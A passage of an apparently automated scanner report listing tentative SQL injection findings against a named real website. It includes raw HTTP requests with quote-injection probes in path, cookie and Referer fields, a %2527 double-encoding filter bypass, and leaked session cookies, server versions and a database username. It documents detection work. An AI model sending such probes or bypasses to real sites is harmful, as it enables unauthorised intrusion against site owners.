1.78. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog'/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 06:23:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 06:23:13 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog''/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:23:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.79. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c';

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:18:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c'';

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:18:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.80. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [optimizelyEndUserId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169';

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'';

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:14:07 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:14:07 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34465


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.81. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [7876d45a49f537da76cfb9e129203eee cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The 7876d45a49f537da76cfb9e129203eee cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 7876d45a49f537da76cfb9e129203eee cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 7876d45a49f537da76cfb9e129203eee cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:10:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:10:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:10:38 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:10:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.82. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 01:12:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 01:12:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:12:04 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 01:12:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.83. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0'; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:12:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0''; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:12:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.84. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [optimizelyBuckets cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:06:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:06:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.85. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/106-google-analytics-health-check.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/106-google-analytics-health-check.html%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
